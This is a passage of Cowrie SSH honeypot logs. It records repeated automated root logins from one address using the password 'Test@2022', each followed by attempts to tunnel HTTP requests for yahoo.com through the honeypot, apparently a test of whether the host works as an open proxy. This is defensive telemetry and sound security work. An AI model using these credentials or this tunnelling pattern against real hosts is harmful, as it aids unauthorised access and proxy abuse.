ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.125797Z","src_ip":"213.209.150.239","session":"4bb0bc2039c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.407264Z","src_ip":"213.209.150.239","session":"4bb0bc2039c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":18057,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:18057","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.464769Z","session":"4bb0bc2039c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.521445Z","src_ip":"213.209.150.239","session":"4bb0bc2039c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":7420,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7420","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.674914Z","session":"4bb0bc2039c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.731466Z","src_ip":"213.209.150.239","session":"4bb0bc2039c4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.788922Z","src_ip":"213.209.150.239","session":"4bb0bc2039c4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44400,"dst_ip":"1.2.3.4","dst_port":22,"session":"06d840459007","protocol":"ssh","message":"New connection: 213.209.150.239:44400 (1.2.3.4:22) [session: 06d840459007]","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.844736Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.845812Z","src_ip":"213.209.150.239","session":"06d840459007"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:54.902347Z","src_ip":"213.209.150.239","session":"06d840459007"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:55.184520Z","src_ip":"213.209.150.239","session":"06d840459007"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":5455,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:5455","sensor":"my-vps","timestamp":"2025-08-26T01:06:55.242577Z","session":"06d840459007"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:55.299563Z","src_ip":"213.209.150.239","session":"06d840459007"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":25889,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25889","sensor":"my-vps","timestamp":"2025-08-26T01:06:55.455091Z","session":"06d840459007"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:55.511847Z","src_ip":"213.209.150.239","session":"06d840459007"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:55.569306Z","src_ip":"213.209.150.239","session":"06d840459007"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44457,"dst_ip":"1.2.3.4","dst_port":22,"session":"eddc8a338917","protocol":"ssh","message":"New connection: 213.209.150.239:44457 (1.2.3.4:22) [session: eddc8a338917]","sensor":"my-vps","timestamp":"2025-08-26T01:06:55.625434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:55.626077Z","src_ip":"213.209.150.239","session":"eddc8a338917"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:55.682841Z","src_ip":"213.209.150.239","session":"eddc8a338917"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:55.965233Z","src_ip":"213.209.150.239","session":"eddc8a338917"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":18512,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:18512","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.022788Z","session":"eddc8a338917"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.079635Z","src_ip":"213.209.150.239","session":"eddc8a338917"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":7274,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7274","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.235015Z","session":"eddc8a338917"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.291768Z","src_ip":"213.209.150.239","session":"eddc8a338917"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.349150Z","src_ip":"213.209.150.239","session":"eddc8a338917"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44524,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b4a58fca71f","protocol":"ssh","message":"New connection: 213.209.150.239:44524 (1.2.3.4:22) [session: 2b4a58fca71f]","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.395142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.396317Z","src_ip":"213.209.150.239","session":"2b4a58fca71f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.443204Z","src_ip":"213.209.150.239","session":"2b4a58fca71f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.677433Z","src_ip":"213.209.150.239","session":"2b4a58fca71f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":9451,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:9451","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.725164Z","session":"2b4a58fca71f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.772193Z","src_ip":"213.209.150.239","session":"2b4a58fca71f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":9787,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:9787","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.909401Z","session":"2b4a58fca71f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:56.956377Z","src_ip":"213.209.150.239","session":"2b4a58fca71f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.004824Z","src_ip":"213.209.150.239","session":"2b4a58fca71f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44576,"dst_ip":"1.2.3.4","dst_port":22,"session":"fedda93fc342","protocol":"ssh","message":"New connection: 213.209.150.239:44576 (1.2.3.4:22) [session: fedda93fc342]","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.060611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.061431Z","src_ip":"213.209.150.239","session":"fedda93fc342"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.117482Z","src_ip":"213.209.150.239","session":"fedda93fc342"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.400248Z","src_ip":"213.209.150.239","session":"fedda93fc342"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":13767,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:13767","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.457926Z","session":"fedda93fc342"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.514905Z","src_ip":"213.209.150.239","session":"fedda93fc342"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20391,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20391","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.671069Z","session":"fedda93fc342"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.727859Z","src_ip":"213.209.150.239","session":"fedda93fc342"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.785269Z","src_ip":"213.209.150.239","session":"fedda93fc342"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44636,"dst_ip":"1.2.3.4","dst_port":22,"session":"df274de6a89c","protocol":"ssh","message":"New connection: 213.209.150.239:44636 (1.2.3.4:22) [session: df274de6a89c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.840860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.841745Z","src_ip":"213.209.150.239","session":"df274de6a89c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:57.898189Z","src_ip":"213.209.150.239","session":"df274de6a89c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.180184Z","src_ip":"213.209.150.239","session":"df274de6a89c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":1710,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1710","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.238521Z","session":"df274de6a89c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.295663Z","src_ip":"213.209.150.239","session":"df274de6a89c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":2530,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2530","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.450977Z","session":"df274de6a89c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.507723Z","src_ip":"213.209.150.239","session":"df274de6a89c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.565714Z","src_ip":"213.209.150.239","session":"df274de6a89c"}
